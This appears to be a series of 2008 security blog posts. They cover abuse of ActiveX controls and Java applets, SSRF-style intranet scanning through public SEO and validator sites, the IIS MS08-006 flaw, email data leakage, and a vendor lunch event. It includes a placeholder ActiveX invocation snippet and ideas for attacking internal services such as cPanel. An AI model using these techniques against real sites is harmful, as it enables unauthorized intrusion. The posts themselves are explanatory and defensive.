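<!-- The classid below is a placeholder; an attacker would use the
CLSID of a control known to be installed and vulnerable -->
<object classid="clsid:00000000-0000-0000-0000-000000000000" id="ctl"></object>
<script>
try {
document.getElementById('ctl').LaunchSomething(); // hypothetical method
} catch (e) { /* control missing or blocked */ }
</script>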

An easy way to prevent ActiveX objects and Java applets from being misused by other web sites is to hard-code the list of domains allowed to use the object in its own source. Unfortunately, in some cases this is not a feasible solution, as the code may be meant to be hosted on multiple domains. Case in point: the MS RDP ActiveX control. Lots of web sites use this control to embed a remote desktop window in the browser.

Since we can't rely on the components to protect themselves from abuse, I think the browser should provide more protection. Why can't the browser sandbox the code such that only the web sites which installed them can actually invoke them? How hard is it to maintain an inventory of installed objects/applets and enforce access control lists for web sites? Even in cases where multiple sites use the same control, a user-controllable white list could help protect against abuse. Users should be able to white-list web sites which are allowed to use the control, or white-list the control itself for all sites.

One particular Java applet I've analyzed employs a hard-coded white list. The purpose of this applet is to launch a server-specified executable file on the client computer. If a malicious web site were able to invoke this applet from the browser's cache, it could possibly launch an arbitrary executable. See the code below:

private static final String legalDomains[] = {
".domainA.com", ".domainB.com", ".domainC.com"
};

private boolean IsLegalDomain()
{
// Compare the hosting page's domain against the hard-coded white list
String browserDomain = getDocumentBase().getHost();
boolean securityException = false;
for (int i = 0; i < legalDomains.length; i++)
{
if (!browserDomain.endsWith(legalDomains[i]))
continue;
securityException = true;
break;
}
return securityException;
}


If the domain returned by the web browser is not in the hard coded white list, the applet will fail securely. Unfortunately, this would not stop a dedicated attacker; it would just force him or her to change their approach.

While this reduces the client side attack surface, it makes the white listed websites more of a target because they are trusted by the client. Without the white list, you could just own the client. With the white list, you need to own the domain in order to own the client. XSS, persistent XSS and other vulns that allow attackers to control site content should allow you to successfully attack the client side code.

Additionally, this opens the door for another client side vulnerability to be leveraged to exploit the vulnerable AX or applet code. DNS spoofing and CSRF based router attacks that lead to client DNS setting compromise can both lead to malicious code being hosted under trusted, white listed domains.

It is nothing new that client-side code such as applets and AX objects greatly increases the client-side attack surface. What scares me is that software vendors don't seem to be getting any more hesitant to use them. In fact, from the research I've been doing, it seems that vendors will generally opt for enhanced client-side functionality (like auto-launching EXEs) at the expense of security.

Friday, February 15, 2008

Internet Facing SEO/Validator Sites vulnerable to Intranet Hacking

While looking for additional data to progress the development of my WebSite Intranet Scanning tool based on RSnake's original paper on Intranet hacking through web sites, I hit the jackpot in terms of finding sites that appear to be vulnerable.

SEO (search engine optimization) site scanners and HTML/XML/etc. page validators generally allow anonymous users to specify URIs to be scanned and validated. Unfortunately, almost NONE of the sites I found appear to validate these user-supplied URIs before fetching them and performing whatever analysis they do.

Some screen shots for your viewing pleasure.
The first site allowed us to scan http://127.0.0.1, revealing all sorts of good stuff about what's running on the server, as well as the fact that the cPanel control panel is hosted on this address.

Since these sites work by sending a simple HTTP GET for the user specified URI, we could probably leverage known cPanel vulnerabilities against this site, and possibly own the box from the inside.

The second screen shot is from another site and shows more of the same.

What is really interesting about these sites versus the ones I've found before is that many of them actually spit the content back out at you. I'd been focusing on using timing to determine if hosts/ports are listening, but these applications will give you the content served, or if the host is not up, give you a nice error message saying so.

I thought about responsibly disclosing these problems to the web site owners, but I'd be doing that until my fingers fall off since there are so many of them. So consider this my responsible disclosure.

How can this be prevented? Easy: validate user-supplied input. Don't allow users to submit URIs containing 127.0.0.1, localhost, or addresses in your local address space. It probably isn't too hard to write a decent white-list regex that allows only FQDNs and public IP ranges.
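
A first-pass check might look something like this sketch (illustrative only; it ignores IPv6, redirects, and DNS tricks that resolve a public name to an internal address):

function isAllowedTarget(uri) {
// Pull the host portion out of the URI
var host = uri.replace(/^https?:\/\//i, '').split(/[\/:?#]/)[0];
// Reject loopback and RFC 1918 private ranges
if (/^(localhost|127\.|10\.|192\.168\.)/i.test(host)) return false;
if (/^172\.(1[6-9]|2[0-9]|3[01])\./.test(host)) return false;
return true;
}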

Some sites actually did block the request. Funnier still, some sites with multiple scanners/validators had mixed results, with one scanner being vulnerable and another not.

Thursday, February 14, 2008

IIS Remote Exploit

MS08-006 is a treat we haven't had in a while: a remotely exploitable code execution vuln in IIS. To be fair, the remotely exploitable part requires that an ASP script be written in such a way that it allows user-supplied input to be passed to a vulnerable function. That said, it is still pretty cool.

HD Moore has a great write-up detailing how he reverse engineered the MS08-006 patch using IDA Pro & BinDiff to find the actual vulnerability. I'm sure a handful of people out there have done the same, but it is pretty cool to see a blow-by-blow account of how it is actually done.

Tuesday, February 12, 2008

EMail 101

Originally, I started off this post by complaining that people don't understand the value of their data. Unfortunately, this morning I realized that we're even further behind the eight ball than I originally thought. People still don't understand the power of email.

I checked my corporate email this morning to find that someone spammed thousands of people asking if we would have sushi in one of our cafeterias this Friday. How did this happen? The notorious "Reply All" button. On top of that, two messages later, was the convenient "so and so wishes to recall a message" message. Now I have two extraneous emails in my inbox. When I click on the recall message, it goes away, but I'm still left with the original spam. Sweet.

Last week I read an article about an information leakage snafu that happened between two law firms working on a high-profile case against Eli Lilly, brought by the US DoJ.

A lawyer (lawyer A) from one law firm tried to email a sensitive document to a co-counsel (lawyer B) who worked for a different law firm. The co-counsel shared the same last name as a NY Times reporter who also happened to be in lawyer A's address book. Instead of emailing the document to lawyer B, lawyer A inadvertently gave the NY Times reporter the scoop on a big settlement Eli Lilly was about to make with the US DoJ.

This situation could have been prevented if lawyer A had the forethought and awareness to realize that maybe this document should be encrypted. Even if it had been sent to the correct recipient, the document could have been viewed by others en route to the destination mailbox.

But that's how a security guy thinks.

Regular users like lawyer A don't even think to look at who is in the "to" and "cc" fields before they send email, let alone worry about whether or not data should be encrypted.

One idea I have for a technical control to force people to think about the email they are about to send is to place a daily limitation on the number of emails one person can send. I know the only time some people think about cleaning old messages off the email server is when they are not allowed to send any more outgoing messages.

If you were only allowed to send 5 corporate email messages per day, you'd better make sure you really need to send a particular message. Hopefully, it would also make people think twice about the content and the recipient list.

On top of that, perhaps making PGP or S/MIME encryption the default for outgoing messages would help increase awareness about handling sensitive data. Alerting users when they are about to send plaintext email to someone for whom they don't have the required certificates might give them pause.

If users can't be trusted to use email responsibly, it is up to administrators to put controls in place.

Wednesday, February 6, 2008

WhiteHat Security NJ Lunch

I just got back from the WhiteHat Security lunch event here in NJ. It was really cool to meet Jeremiah Grossman, and together with my colleague Daniel, the three of us had a fun discussion about CSRF & DNS rebinding.

The first part of the presentation was delivered by Jeremiah, as he went over the Top 10 Web Hacks of 2007. He crammed a lot of technical content into 35 minutes, but it was very well organized and he did a good job of simplifying it. I think a lot of the audience was non-technical, but I always think it's good for those folks to get a healthy dose of reality explained to them. I also picked up some technical details I had previously not realized.

The second part was a presentation by a WhiteHat partner company called SecurView. They offer outsourced, managed security solutions, one of which is WhiteHat's Sentinel. SecurView argues that security talent and expertise are hard to recruit and retain, so outsourcing is the way to go. That doesn't make sense to me: won't it be just as hard for SecurView to recruit and retain from the same limited pool of security talent?

If you don't have the resources to hire and retain security talent, I think the best thing a company can do is bring in consultants to help build its security infrastructure in house. Outsourcing may seem like a cheap alternative, but you sacrifice control and need to place a lot of confidence and faith (trust) in the outsourcer, and whoever they subsequently outsource to. Case in point, SecurView mentioned that they use co-location centers for hosting to keep costs down. How do you know the colo company is doing things right?

I think what it comes down to isn't risk transference, but blame transference. A company who can't get a handle on security themselves might be willing to pay a premium and place their trust in a company who claims to provide secure services. This way, if they get hacked, it's the fault of the outsourcer.

The final part of the event was an overview of the Sentinel service from WhiteHat's VP of Sales. I've always thought this service is a cool idea, and I'd really like to see what it looks like from a client perspective. Sentinel is a hybrid service that combines technology (a scanner) and people in an iterative process, developing knowledge of how an application works in order to more effectively find vulnerabilities. The operations folks at WhiteHat add a human element to the scanner, as they manually follow up on scanner findings and act as a reference point for clients who need more info.

All in all, the food was good (and free!), and the subject matter was very interesting to me. If you have the time, I would recommend checking WhiteHat out the next time they come around.